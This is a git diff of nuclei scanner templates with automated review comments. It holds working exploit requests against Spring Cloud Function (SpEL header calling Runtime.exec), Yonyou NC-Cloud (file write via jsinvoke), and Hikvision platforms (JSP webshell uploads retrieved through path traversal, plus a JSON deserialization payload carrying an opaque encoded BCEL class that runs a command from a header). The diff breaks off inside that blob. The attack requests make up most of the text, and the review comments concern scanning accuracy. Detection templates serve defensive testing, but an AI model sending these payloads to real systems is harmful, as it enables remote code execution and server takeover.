"{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml 
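Review bot: The new matcher (`words: ['functionRouter']` plus `status: 500`) no longer proves SpEL evaluation: a Spring Boot default error body for a 500 at `/functionRouter` contains that path whether or not the routing-expression header was evaluated, and `T(java.lang.Runtime).getRuntime().exec("")` produces nothing observable in-band, so the template now fires on any 500 from that path while confirming nothing. The removed out-of-band check (`T(java.net.InetAddress).getByName("{{interactsh-url}}")` with `part: interactsh_protocol`) was the actual proof and should be restored, or the expression replaced by one whose result is reflected in the response. Two smaller defects: `"{{RootURL}}%2fadmin%2functionRouter"` is missing the `f` of the second `%2f` and so requests `/admin/unctionRouter`, and the `"{{RootURL}}../../..."` entries lack a slash between host and `..`, producing malformed URLs. `cwe-id: CWE-770` (resource consumption) is wrong for an expression-injection RCE; the previous `CWE-94` was correct, and the dropped references and `kev` tag should come back.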
@@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file 
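Review bot: The first request writes a file under `webapps/nc_web/{{str1}}` on the target and nothing removes it, so the template should carry the `intrusive` tag (as `dahua-wpms-addimgico-fileupload.yaml` in this same commit does) and the description should say the artifact is left behind. The matcher compares against the literal `5d8be7535d6383e99315739724e10fa7`, which has to be kept equal to `{{md5('yonyou-nc-cloud-jsinvoke-rce')}}` in the request body by hand; a single per-run marker, e.g. `variables: marker: "{{rand_base(16)}}"` used in both the body and the matcher (as `contains(body_2, marker)` in a dsl matcher if your nuclei version does not substitute variables in `words:`), removes that coupling and also prevents a file left by an earlier scan from matching. The `nc-cloud` tag was dropped from `tags:`, which breaks `-tags nc-cloud` selection.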
diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,20 +1,19 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - raw: - | - POST /center/api/files;.html HTTP/1.1 + POST /svm/api/external/report HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -25,11 +24,17 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and 
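Review bot: `contains(body_2, "test")` combined with a fixed `test.jsp` name is not evidence that this scan's upload executed — the word "test" is common in 200 pages, and a `test.jsp` left by a previous scanner or another team would satisfy it too. Use per-run values as the sibling `Hikvision_iVMS-8700_upload_action.yaml` in this commit does: `variables: str1: '{{rand_base(6)}}'`, `str2: '{{rand_base(6)}}'`, filename `{{str1}}.jsp`, body `<%out.print("{{str2}}");%>`, then `contains(body_2, str2)`. `contains(body_1, "data")` on the upload response is similarly weak; match the key the `/svm/api/external/report` response actually returns. The multipart `Content-Disposition` line carrying the filename sits between the two hunks and is outside this view, and `id: HiKVISION` is shared with the other Hikvision templates in this commit, which nuclei treats as a duplicate-id error.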
diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml 
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 0ebd67934b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
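Review bot: The matcher `"nt authority\\system"` only fires when the embedded class runs `whoami` on a Windows host as SYSTEM; the same exploit on Linux, or under a service account, returns other output and is reported as not vulnerable. Send a marker instead of relying on the user name, e.g. `Testcmd: echo {{marker}}` with `variables: marker: "{{rand_base(8)}}"` and `words: ["{{marker}}"]` — this assumes the loaded class passes the `Testcmd` header through a shell, which cannot be read from the `$$BCEL$$` blob and should be confirmed against its source. That blob is opaque bytecode executed on the target; the template should record where the class came from (a link or the Java source in a comment) so a reviewer can audit what it does beyond running the command. The file is still named `_upload.yaml` and `name: HIKVISION` says nothing; name it for the `/bic/ssoService/v1/applyCT` `@type`-driven JSON deserialization it now exercises, tag it `intrusive`, and give it an `id` distinct from `Hikvision_iVMS-8700_upload_action.yaml`, which also uses `HIKVISION`.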
@@ -1,27 +1,48 @@ id: HIKVISION info: - name: HIKVISION + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
